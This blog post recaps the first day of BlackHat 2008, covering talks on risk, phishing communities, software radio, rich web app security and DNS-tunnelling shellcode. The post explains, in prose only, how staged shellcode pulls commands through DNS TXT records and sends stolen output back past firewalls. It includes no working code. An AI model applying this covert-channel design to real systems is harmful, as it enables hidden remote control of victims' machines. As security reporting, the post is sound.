BlackHat 2008, Day 1

Today was the first day of this year’s BlackHat Briefings in Las Vegas. The biggest security conference of the year, it’s always an interesting place to be and often involves the release of new and previously unknown exploits.

The keynote speaker was Ian Angell, of the London School of Economics, who was speaking, ostensibly, about risk. He is described as having “very radical and constructive” views on the subject. His primary point was that when you put together a bunch of parts into a system, it often goes off the rails — every action leads not just to a reaction, but a loop wherein the unintended consequences feedback into themselves. This makes control very difficult (he brought up Goodhart’s Law, “any observed statistical regularity will tend to collapse when pressure is placed on it for control purposes.) The IT industry is obsessed with providing more information, but omnipresent computer screens distract and cause errors in judgment — people come to rely entirely on the system, suspending independent thought and just blindly following the machine, while simultaneously missing details in the information overload.

Humans are obsessed with categorization — the attempt to treat the similar as identical. We deal with complexity by dropping less-significant relationships from our mental models — but those relationships still exist, and this creates uncertainty and risk. Not just computer systems have this problem; bureaucracy is the most effective way to deal with normal situations, but as anyone who has dealt with one knows, it is terrible at dealing with anything out of the ordinary.

However, for all this, I found Professor Angell basically useless. He’s comes across as very smart and amusing, but he points out problems without the slightest inkling of a solution. Yes, systems create complexity, from which comes risk. Shall we then abandon IT security in favor of a hunter-gatherer society? I don’t think I could get an answer on that from him.

The next presentation was by Billy Rios and Nitesh Dhanjani on the phishing culture and community. They observed some phishing code and noticed common strings, and thought to do a Google search on them with the intent of finding other places that phishing code was in use. Instead, they found thousands of credit card numbers, SSNs, and other identity information all over the Internet, in public forums, searchable on Google. The phishers throw around identities constantly, just to prove their authenticity. Meanwhile, they phish each other constantly — most of the phishing kits they found had back-doors in them or secret code to email a copy of all identities captured to their author. They’re not hackers at all; they generally know just enough to upload a kit someone else wrote to a site someone else hacked and collect the information. Also, ironically, the Google anti-malware blacklist turns out to be a fantastic way to find already-hacked sites to put phishing kits on — it’s full of Administrative logins and passwords.

This was followed by Dan Kaminsky’s DNS update, which I’m going to discuss in a separate post; for all its hype, I think it lived up to it. Faulty DNS is a Really Bad Thing.

Michael Ossmann had a presentation to give on software radio and the future of wireless security. Unfortunately, it was long on software radio and short on security. He mostly spoke about the USRP, a piece of open-source hardware (also available pre-built for $700) that gives full software radio capabilities to a PC. It can capture a significant amount of bandwidth in a range up into the 2.4 GHz band. Ossmann’s demonstration of this involved doing packet-capture on Project 25 radios, and a replay attack on a remote-control toy. Essentially, command-line tools can capture radio on most frequencies, and then (as it’s just a bitstream) DSP techniques can manipulate it arbitrarily.

While his speech had very little about security in it, the implications are significant in the long term. Making a good radio means either using very expensive analog components, or using cheap analog components and a lot of CPU power. In a few years, “a lot of CPU power” will be available on your phone, just given the rate at which CPUs improve. Wireless (802.11) security didn’t become a big issue as soon as it was possible to crack WEP (i.e. almost instantly) — it became a big issue when wireless cards with raw packet injection and monitor mode started to be cheap and ubiquitous. Wireless hacking takes a $700 USRP now; it’ll take a cell phone in 5 years (since as CPUs get more powerful, software radio gets cheaper than hardware, it’s only a matter of time until radios in phones and such are pure software, and thus reprogrammable.) You can see the beginning of this in THC’s GSM Project. If the cell phone network finds itself, security-wise, as badly off as 802.11 is today, it could be a frightening thing.

Alex Stamos and company from iSec Partners had a presentation on Rich Internet Application frameworks.  Rich Internet Applications aren’t well-defined, but they contain one or more of the following: AJAX UIs, local storage, an offline mode, running outside the browser, access to hardware resources, or the general appearance of a thick-client app.  Adobe, Microsoft, and others have created various apps and tools to help developers create these rich web apps.

Adobe AIR is the most full-featured of them — an AIR application runs in a full desktop runtime based on Flash.  There’s no sandboxing — a locally-installed AIR app has the full powers of the user, like an ActiveX control.  You can develop them in Flash, Flex, or JavaScript.  However, AIR apps can be launched from the web by ordinary Flash files (assuming the app is already installed on your computer.)  There is a remote mode, for running directly off the web with reduced privileges, but there’s a method for communicating and even passing objects between the local (full-trust) and remote modes.  Overall, it’s a scary thing, in the way that EXEs are scary (i.e. it’s insecure, but not any more insecure than everything else.)

Microsoft’s Silverlight is rather more restricted; it’s closer to Flash than to AIR.  Silverlight apps can be written in XAML with any .NET language, and use a scaled-down .NET runtime.  There is socket support, like Flash, but it is limited to certain sockets (4502-4534) and requires a policy file (clientaccesspolicy.xml) on the target server, even if the target server is the same site it came from.

Google Gears is even less functional than Flash and Silverlight; it’s essentially running HTML and JavaScript from the local machine.  There is local storage, and data sync with an API and SQLite for relational-database-like storage.  Also, it has the ability to run processes in a threadpool outside the browser, so as not to get shut down by the browsers’ tight-loop detection.  Bizarrely, it allows the app author to customize the installation warning dialog, making it quite easy to convince people to install weird Gears apps.  It would be good for distributed malware, like cryptanalysis.

Yahoo! Browser Plus is designed to make it easy to write browser plugins, which is kind of like making it easy to make bombs.  There are some things that shouldn’t be easy, because the less of them, the better, and browser plugins (almost all of which seem to be adware/spyware) are one of them.  BrowserPlus add-ons are initialized by an HTTP call to Yahoo!, and run with full trust.  It’s like ActveX with a built-in Ruby interpreter (an old, buggy one, even.)

Finally, Mozilla Prism is a site-specific browser with the browser UI stripped off.  Formerly known as WebRunner, it’s used to “desktopize” web apps.  The risk here is comparitively low, though the script has XPCOM privileges (basically, control over the browser itself, like a Firefox extension would have.)

You can also just use HTML5 for some rich functionality, like local storage.  There is DOM storage, allowing you to persist up to 5MB of data locally, as well as SQLite-based database functionality.  DOM storage is essentially the ability to save immense cookies that are subject to SQL injection attacks.  The W3C has had better ideas.  Also, unlike cookies, you can’t easily turn DOM storage off (there’s a Firefox about:config setting, but nowhere in the UI.)  As mobile devices bundle Webkit browsers (like Safari), they’ll be subject to this type of storage — it would be pretty easy to DoS a mobile device by writing dozens of 5MB cookies.

So, what does all this lead to?  A host of new security issues we never had to think about before, of course!   The RIA data stores are vulnerable to XSS — if your email or other personal data is in an AIR or Gears app, and someone gets an XSS on the sites the apps come from, they can steal your entire data store.  You can have SQL injection against JavaScript now, thanks to SQLite databases.  The same Flash-based XSS attacks we’ve seen now work on Silverlight and AIR as well.

On the bright side, they had some good prescriptive guidance for app developers:

  1. Don’t use predictably-named data stores
  2. Parameterize SQL, even on local SQLite stores
  3. Domain-lock sites if possible
  4. Don’t use AIR when Flash/Flex/Silverlight/etc. will do fine
  5. Let users opt out of RIA functionality

Finally, Ty Miller had some shellcode to show us — reverse DNS tunnelling staged-loading shellcode, in fact.  The trend in vulnerabilities has been toward client-side exploits of late, now that socket-based servers have been hardened significantly.  However, if you do buffer-overflow a client app and get it to execute shellcode, the challenge is often getting a connection back to the attacker.  Clients are often behind firewalls, proxies, NATs, or all three.

Of the common shellcode techniques (port binding, callback, find-socket, address reuse, download & execute, and HTTP tunneling), only one (HTTP tunneling) works reliably with client apps — and Metasploit’s HTTP tunneling shellcode only works on IE6 with ActiveX enabled.  DNS tunneling (like Kaminsky’s OzymanDNS from 2004) would also get back — and even more reliably than HTTP, since it wouldn’t need to worry about authenticated proxies.

DNS gets through everything.  When you make a DNS request, it goes to your company or ISP’s DNS server, which forwards it on to a top-level server (like .com) and then to the DNS server that owns the domain name.  Practically everything makes DNS lookups (as Dan Kaminsky went into today), and nothing works if they’re blocked, so any computer is all but guaranteed to have DNS access.  With a malicious DNS server, you can actually tunnel arbitrary data through DNS.

Miller’s shellcode consisted of a tiny first stage which finds kernel32, creates pipes for STDIN and STDOUT, then makes an nslookup (yes, it shells out to nslookup) for a TXT record on the malicious DNS server.  The TXT record type can be extremely long, and the record it gets back contains the second-stage shellcode and a command to run.  The second stage shellcode runs the command, captures the output, and sends it back in fragmented DNS requests.  It then polls periodically for more commands to run.  The DNS requests all have a sequence number in them, guaranteeing that they don’t get cached and always get through.

He’s making his code available at projectshellcode.com, a site where he hopes to focus shellcode research and start a collection.  I think this is of dubious value (unlike exploits, shellcode is not really very useful to security folks on the “good guys'” side most of the time), but it’ll be interesting to take a look at what he’s come up with.

attacks, hardware, industry, mitigations, SOA/XML

If you enjoyed this post, please consider to leave a comment or subscribe to the feed and get future articles delivered to your feed reader.